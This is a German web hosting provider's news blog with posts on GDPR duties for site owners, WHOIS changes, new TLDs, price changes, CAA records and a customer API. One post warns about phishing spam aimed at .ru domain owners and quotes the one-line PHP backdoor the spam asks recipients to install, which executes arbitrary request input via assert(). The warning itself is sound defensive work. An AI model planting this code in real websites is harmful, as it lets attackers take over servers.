Autor: Justus Pilgrim

24. Mai 201824. Mai 2018

Was ändert sich durch die DSGVO?

Am Freitag, den 25.05.2018 tritt die neue EU-Datenschutzgrundverordnung (DSGVO / englisch: GDPR) in Kraft. Für Verbraucher bringt die DSGVO viel Gutes mit: Es gibt ein Recht auf Datenlöschung, ein Recht auf Widerspruch und ein Auskunftsrecht. Umfangreiche Informationspflichten sollen Transparenz bei der Datenverarbeitung sicherstellen. Das Prinzip der Datensparsamkeit steht künftig an oberster Stelle – nur Daten, die tatsächlich für die Erfüllung einer Aufgabe benötigt werden, dürfen erhoben, gespeichert und verarbeitet werden.

Leider bringen neue Gesetze oft auch eine Menge neuer Bürokratie mit sich. Besonders kleine Unternehmen und auch Privatpersonen mit eigenen Webseiten fühlen sich von den umfangreichen DSGVO-Regelungen überfordert. Wir möchten Ihnen in diesem Artikel einen kleinen Überblick darüber geben, was sich durch die DSGVO für die meisten unserer Kunden ändert und an welcher Stelle unsere Dienste mit der DSGVO in Berührung kommen. Der Artikel kann keine Rechtsberatung ersetzen und erhebt auch nicht den Anspruch, vollumfänglich über die DSGVO zu informieren – das ist angesichts der Fülle der Regeln kaum möglich.

Was muss ich als Betreiber einer Webseite beachten?

SSL-Zertifikate: Sobald Sie irgendeine Art von personenbezogenen Daten auf Ihrer Webseite erfassen – sei es über ein Kontaktformular, eine Newsletter-Anmeldung, einen Online-Shop oder sonstige Funktionen, bei denen ein Nutzer Ihnen gegenüber etwas Preis gibt, muss die jeweilige Webseite über ein SSL-Zertifikat (https://…) abgesichert werden. In vielen unserer Hosting-Pakete sind SSL-Zertifikate im Preis bereits enthalten; zusätzliche Zertifikate können ab 6,- Euro pro Jahr (Reseller: 3,- Euro pro Jahr) gebucht werden. Informationen zu den Unterschieden verschiedener Zertifikatstypen finden Sie auf unserer Webseite. Die Bestellung eines Zertifikats erfolgt formlos per E-Mail.

Datenschutzerklärung: Sie müssen in einer Datenschutzerklärung auf Ihrer Webseite angeben, wie Sie mit den Daten Ihrer Besucher umgehen. In erster Linie geht es dabei darum, welche Daten Sie (oder wir als Ihr Webhoster) von den Besuchern Ihrer Webseite speichern. Zur Erstellung einer DSGVO-konformen Datenschutzerklärung gibt es zahlreiche kostenlose und kostenpflichtige Generatoren im Internet; im Zweifelsfall konsultieren Sie bitte unbedingt einen Juristen. Bezüglich der von uns erstellten Logdateien ist wichtig, welche Daten wir serverseitig speichern. Bitte beachten Sie dazu folgende FAQ-Artikel: Wie lange werden die Logdateien aufbewahrt? und Wie sind die HTTP Access Logs aufgebaut?

Auftragsverarbeitungsvertrag: Als gewerblicher Betreiber einer Webseite sollten Sie mit uns einen Auftragsverarbeitungsvertrag abschließen. In diesem Vertrag ist geregelt, wie wir Ihre und die Daten Ihrer Kunden auf unseren Servern verarbeiten. Bestandteil des AV-Vertrags sind die “Technischen und organisatorischen Maßnahmen”, die wir anwenden, um Ihre Daten zu schützen. Der Abschluss eines AV-Vertrags mit uns ist hier unter Verwendung Ihrer persönlichen Zugangsdaten zum Kundenmenü möglich.

An dieser Stelle noch einmal der Hinweis: Diese Übersicht ist nicht vollständig. Je nach Branche und Art der Weise, wie Sie Daten erheben und verarbeiten, können und werden noch weitere Themen für Sie relevant sein, auf die wir hier nicht eingehen können.

Was ändert sich bei der Domainregistrierung?

Whois-Daten: Bei der Registrierung einer Domain wurden bisher bei den meisten Registrierungsstellen umfangreiche Daten des Domaininhabers, des administrativen Ansprechpartners und der technischen Kontakte abgefragt, darunter auch E-Mail-Adressen und Telefonnummern. Diese Daten wurden allerdings nicht nur bei den Registrierungsstellen gespeichert, sondern auch im öffentlichen Whois angezeigt. An beiden Punkten gibt es durch die DSGVO nun Änderungen. Einige Registrierungsstellen erfassen nur noch die Daten eines Domaininhabers; sowohl der administrative als auch der technische Kontakt entfällt bei diesen Top-Level-Domains (z.B. .de). Andere Registrierungsstellen erfassen weiterhin alle Daten, veröffentlichen im Whois aber nur noch einen kleinen Teil davon. Bei den meisten Top-Level-Domains wird im Falle einer Registrierung für eine Organisation der Name der Organisation und das Land, in dem die Organisation ihren Sitz hat, im Whois angezeigt. Bei Privatpersonen wird nur noch das Land des Inhabers angezeigt.

Vermittlung: Wie bisher kommt der Vertrag für eine Domainregistrierung zwischen dem Domaininhaber und der Registrierungsstelle zustande. Wir vermitteln diesen Vertrag und verwalten die Domains für Sie bei der Registrierungsstelle. Nach wie vor übermitteln wir Ihre Daten – je nach Top-Level-Domain – auch an Drittstaaten. Diese Übermittlung ist jedoch zwingende Voraussetzung dafür, die gewünschte Domain registrieren zu können.

27. April 2018

Jetzt sichern: Die passende .app-Domain für Ihre App!

Am 08.05.2018 startet die neue Domainendung “.app”, die sich an alle Entwickler und Betreiber von Apps richtet. Eine .app-Domain ermöglicht eine kurze, einprägsame und werbewirksame Präsentation von Apps.

Wir bieten .app-Domains für 21,- Euro pro Jahr an (17,40 Euro in der Rabattstufe “100”). Die Vormerkung von .app-Domains ist unter https://ntlds.variomedia.de/vormerkung möglich. Noch bis zum 30.04.2018 können Markenrechtsinhaber ihre gewünschten .app-Domains bevorzugt registrieren. Anschließend folgt eine Landrush-Phase, in der eine bevorzugte Registrierung gegen Aufpreis für jeden Interessenten möglich ist. Informationen dazu finden Sie in unserer Übersicht zu .app-Domains.

Das besondere an dieser Top-Level-Domain ist: .app ist eine sichere Domain. Das bedeutet, dass HTTPS für alle .app-Websites erforderlich ist. Sie können Ihre .app-Domain auch ohne SSL-Zertifikat kaufen und z.B. für E-Mails nutzen. Für die Erreichbarkeit einer .app-Domain im Browser müssen Sie jedoch ein Zertifikat beauftragen, das in vielen unserer Hosting-Pakete bereits im Preis enthalten ist (Let’s Encrypt- oder Comodo-SSL-Zertifikat). Die TLD .app ist damit die erste Domainendung der Welt, die dem Nutzer eine sichere Verbindung garantiert.

15. Februar 201815. Februar 2018

Einrichtung von CAA-Records im Kundenmenü

Ab sofort lassen sich im DNS-Bereich des Kundenmenüs Einträge mit dem Typ “CAA” (Certification Authority Authorization) anlegen. Sie dienen der Überprüfung, ob eine bestimmte Zertifizierungsstelle (z.B. Comodo oder Let’s Encrypt) ein SSL-Zertifikat für die jeweilige Domain ausstellen darf. Die Prüfung wird seit September 2017 von allen Zertifizierungsstellen bei der Neuausstellung und Verlängerung von Zertifikaten durchgeführt.

Existieren für eine Domain keine CAA-Einträge, kann jede Zertifizierungsstelle ein Zertifikat für die Domain ausstellen. Wenn CAA-Einträge existieren, darf nur die angegebene Zertifizierungsstelle ein Zertifikat ausstellen. Auf diese Weise wird die missbräuchliche Ausstellung von Zertifikaten deutlich erschwert.

Mehr Informationen und Beispiele zur Nutzung von CAA-Records finden Sie unserem FAQ-Artikel: Was sind CAA-Einträge und wie funktionieren sie?

5. Februar 201815. Februar 2018

Preiserhöhung von .ph-Domains ab 01.04.2018 (aktualisiert)

Die Registrierungsstelle für .ph-Domains hat angekündigt, die Preise für .ph-Domains ab dem 01.04.2018 mehr als zu verdoppeln. Die Preiserhöhung gilt dabei nur für ausländische Registrare; inländische Registrare bezahlen weiterhin den bisherigen Preis.

Ziel der Preiserhöhung ist nach Angaben der Registrierungsstelle eine Förderung der lokalen Internet-Community in den Philippinen. Die zusätzlichen Einnahmen sollen genutzt werden, um Bildungsprojekte vor Ort zu unterstützen.

Wir kommen leider nicht umhin, die Preiserhöhung an unsere Kunden weiterzugeben. Ab dem 01.04.2018 kostet die Registrierung, Übernahme oder Verlängerung von .ph-Domains (auch .com.ph) statt bisher 45,- Euro pro Jahr (ohne Mengenrabatte) künftig 99,- Euro pro Jahr inkl. 19% Mehrwertsteuer.

Noch bis zum 30.03.2018 ist es möglich, .ph-Domains zum alten Preis vorzeitig um bis zu 9 Jahre zu verlängern. Kunden, die davon Gebrauch machen wollen, informieren uns bitte kurzfristig per E-Mail.

Update vom 15.02.2018: Die Registrierungsstelle hat die Preiserhöhung vom 01.03.2018 auf den 01.04.2018 verschoben. Wir haben diesen Artikel daher aktualisiert.

6. Dezember 201726. April 2019

API für Funktionen des Kundenmenüs

Vor einiger Zeit haben wir begonnen, die Funktionen unseres Kundenmenüs auch über eine API verfügbar zu machen. Diese API hat inzwischen einen Stand erreicht, mit dem Kunden bereits produktiv arbeiten können – wenn auch unter der Einschränkung, dass wir noch aktiv an der API arbeiten und jederzeit Änderungen möglich sind.

Die Funktionsvielfalt ist noch überschaubar; nichtsdestotrotz laden wir unsere Kunden herzlich ein, die API auszuprobieren und uns ein Feedback zu den vorhandenen und noch wünschenswerten Funktionen zu geben. Das Angebot richtet sich vor allem an Nutzer, die mit eigenen Scripten oder Tools auf Daten des Kundenmenüs zugreifen wollen.

Aktuell (Stand 06.12.2017) sind folgende Funktionen verfügbar:

Abruf von Domainlisten inklusive der verwendeten Nameserver und der Laufzeiten der Domains
Einrichtung von Subdomains, die auf den Webspace verweisen
Einrichtung von E-Mail-Weiterleitungen an einen oder mehrere Empfänger

Beispiel: Anlegen einer Subdomain über die API

Die Dokumentation zur API finden Sie hier: https://api.variomedia.de/

Die Zugänge zur API basieren auf Benutzern des Kundenmenüs. Um einen Kundenmenübenutzer für die API freizuschalten, benötigen wir die E-Mail-Adresse des Nutzers. Bitte senden Sie dazu eine E-Mail an support@variomedia.de. Das Verfahren funktioniert auch für Endkunden von Resellern; wir können bei Bedarf auch für einzelne Endkunden einen API-Zugang freischalten. Mittelfristig wird die Freischaltung im Kundenmenü möglich sein.

7. August 2017

Gefährlicher Spam an Inhaber von .ru-Domains

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

31. Juli 2017

Aktualisierung zur angekündigten Preiserhöhung am 8.9.2017

Wie bereits im März angekündigt, erhöht die Registrierungstelle Uniregistry ab dem 8.9.2017 die Preise für einige ihrer Top-Level-Domains deutlich. Die Ankündigung der Erhöhung hat Uniregistry viel Kritik eingebracht. Kurz vor Inkrafttreten der Preiserhöhung gibt es nun zumindest eine kleine Abschwächung der Preiserhöhung. Die Änderung umfasst zwei Punkte:

Bei einigen TLDs bleiben die Preise für bereits registrierte Domains unverändert, sie werden nur für neue Domains erhöht. Dazu zählen folgende TLDs: .audio, .blackfriday, .diet, .flowers, .guitars, .hiphop, .property, .hosting, .juegos
Bei anderen TLDs werden die Preise für bestehende Domains – im Verhältnis zum hohen Neuregistrierungspreis – nur gering erhöht. Dies betrifft folgende TLDs: .click, .link, .help, .pics, .sexy, .tattoo, .christmas. Bei .click- und .link-Domains ist die Preiserhöhung so gering, dass wir auf eine Weitergabe des höheren Preises verzichten.

Nach wie vor gilt das Angebot, bestehende Domains noch vor der Preiserhöhung um bis zu 10 Jahre zu verlängern – in diesem Fall gilt der aktuelle Preis für die gesamte Laufzeit, wird allerdings auch sofort abgerechnet. Wir informieren alle Kunden, die von der Preiserhöhung betroffen sind, in den nächsten Tagen noch persönlich per E-Mail.

Die folgende Tabelle zeigt zusammenfassend alle betroffenen Top-Level-Domains, die Preise für Registrierungen / Verlängerungen vor dem 8.9. und die Preise für Registrierungen nach der Preiserhöhung.

	Preis bis 7.9.2017	Preis ab 8.9.2017 für bestehende Domains	Preis ab 8.9.2017 für neue Domains
.help	24,- Euro	39,- Euro	39,- Euro
.pics	21,- Euro	39,- Euro	39,- Euro
.sexy	21,- Euro	39,- Euro	39,- Euro
.christmas	33,- Euro	51,- Euro	51,- Euro
.tattoo	33,- Euro	51,- Euro	51,- Euro
.audio	24,- Euro	24,- Euro	150,- Euro
.blackfriday	33,- Euro	33,- Euro	150,- Euro
.diet	24,- Euro	24,- Euro	150,- Euro
.flowers	33,- Euro	33,- Euro	150,- Euro
.guitars	33,- Euro	33,- Euro	150,- Euro
.hiphop	21,- Euro	21,- Euro	150,- Euro
.property	33,- Euro	33,- Euro	150,- Euro
.hosting	33,- Euro	33,- Euro	450,- Euro
.juegos	24,- Euro	24,- Euro	450,- Euro

Alle Preise in Euro pro Jahr inkl. 19% Mehrwertsteuer.

21. Juli 201721. Juli 2017

Aktion bis zum 31.7.2017: Bis zu 90% Rabatt auf ausgewählte TLDs

Noch bis zum 31. Juli bieten wir ingesamt 18 Top-Level-Domains mit Rabatten bis zu 90% im ersten Jahr (Neuregistrierung) an:

TLD	Normalpreis (pro Jahr)	Aktionspreis im ersten Jahr
.email	18,- Euro	6,- Euro
.city	21,- Euro	6,- Euro
.business	21,- Euro	6,- Euro
.fail	24,- Euro	6,- Euro
.gold	99,- Euro	6,- Euro
.credit	99,- Euro	6,- Euro
.jetzt	21,- Euro	12,- Euro
.schule	21,- Euro	12,- Euro
.events	27,- Euro	12,- Euro
.reisen	33,- Euro	12,- Euro
.gmbh	33,- Euro	12,- Euro
.immo	39,- Euro	12,- Euro
.shopping	39,- Euro	12,- Euro
.marketing	42,- Euro	12,- Euro
.guru	42,- Euro	12,- Euro
.media	42,- Euro	12,- Euro
.restaurant	57,- Euro	12,- Euro
.reise	111,- Euro	12,- Euro

Alle Preise enthalten 19% Mehrwertsteuer. Der Aktionspreis gilt für Neuregistrierungen bis zum 31.7.2017 (Mitternacht). Ausgenommen sind Domains, die die jeweilige Registrierungsstelle als Premiumdomains deklariert hat; diese werden zum jeweiligen Premiumpreis abgerechnet.

Die Vertragslaufzeit bei allen Domains beträgt 1 Jahr mit einer Kündigungsfrist von vier Wochen zum Ende der Vertragslaufzeit.

Neukunden können die gewünschten Domains über unsere Webseite bestellen. Bestandskunden können die gewünschten Domains im Kundenmenü auf Verfügbarkeit prüfen und zur Registrierung beauftragen.

21. Juli 2017

.asia-Domains jetzt ohne Treuhandservice

Ab sofort ist die Registrierung von .asia-Domains auch ohne einen Wohn- oder Firmensitz in Asien möglich. Die Registrierungsstelle hat die Vergabebedingungen für .asia-Domains entsprechend geändert.

Um unseren Kunden in Europa die Registrierung von .asia-Domains zu ermöglichen, haben wir bisher mit einem Anwalt in Japan zusammengearbeitet. Er agierte treuhänderisch als Admin-C für alle bei uns registrierten .asia-Domains. Nach der Freigabe durch die Registrierungsstelle ist dies nun nicht mehr erforderlich. Alle bestehenden .asia-Domains werden in Kürze automatisch durch uns aktualisiert.

Wir bieten .asia-Domains für 24,- Euro pro Jahr an. Reseller erhalten (je nach Gesamtbestand ihrer Domains) einen Rabatt bis zu 15% auf den Jahrespreis. Der Treuhandservice wurde von uns bisher kostenlos zur Verfügung gestellt.

16. März 201716. März 2017

Wichtige Änderungen bei .tel-Domains

10 Jahre lang gab es bei .tel-Domains die Besonderheit, dass diese sich nicht für normale Webseiten nutzen ließen, sondern grundsätzlich auf ein Hosting-System der Registrierungsstelle verwiesen. Jeder Inhaber einer .tel-Domain konnte sich dort einloggen und Kontaktdaten von sich hinterlegen, sei es Anschriften, Telefonnummern, E-Mail-Adressen, Instant Messenger-Kontakte und vieles mehr. Diese Kontaktdaten wurden dann beim Aufruf der Domain angezeigt.

Mit dieser Methode war es einfach und schnell möglich, eine Art Visitenkarte anzulegen. Auch der E-Mail-Empfang war mit .tel-Domains möglich; dies jedoch nicht über das Hosting-System der Registrierungsstelle, sondern – in unserem Fall – über unsere Server.

Seit wenigen Tagen hat sich die Registrierungsstelle von diesem Modell gelöst und behandelt .tel-Domains wie alle anderen Domains auch, d.h. man kann auch eigene Webseiten unter einer .tel-Domain veröffentlichen. In diesem Zusammenhang wurde auch das alte Hosting-System durch eine neue Plattform ersetzt – leider ohne, dass die gespeicherten Kontaktdaten übernommen wurden.

Auch die Angabe unserer Mailserver wurde verworfen, was dazu führte, dass Inhaber einer .tel-Domain keine E-Mails mehr empfangen konnten.

Um den E-Mail-Empfang wieder zu gewährleisten, haben wir die betroffenen .tel-Domains so aktualisiert, dass anstelle der bisherigen Nameserver der Registrierungsstelle unsere Nameserver genutzt werden. Der E-Mail-Empfang war daraufhin wieder möglich und nicht zugestellte E-Mails wurden nachträglich zugestellt. Um das neue Hosting-System der Registrierungsstelle nutzen zu können, sind zwei bzw. drei Schritte erforderlich:

Erstellen Sie unter https://www.do.tel/signup/ einen Account für das neue System.
Beauftragen Sie uns, die Domain mit dem neuen Hosting-System der Registrierungsstelle zu verbinden.
Falls Sie E-Mails mit Ihrer .tel-Domain empfangen möchten, loggen Sie sich unter https://www.managemy.tel mit Ihrem neu erstellten Account ein, klicken Sie oben rechts auf “Settings” und dann auf “Setup .tel email”. Geben Sie hier im Feld “Order” eine “10” ein und bei Server host name “mail.variomedia.de”.

Bitte entschuldigen Sie die Unannehmlichkeiten, die durch die Umstellung auf das neue Hosting-System entstanden sind. Die neue Plattform bietet eine Vielzahl neuer Möglichkeiten und ist durchaus einen Blick wert. Ein einfaches Beispiel für eine .tel-Seite finden Sie hier: http://telpage.tel/.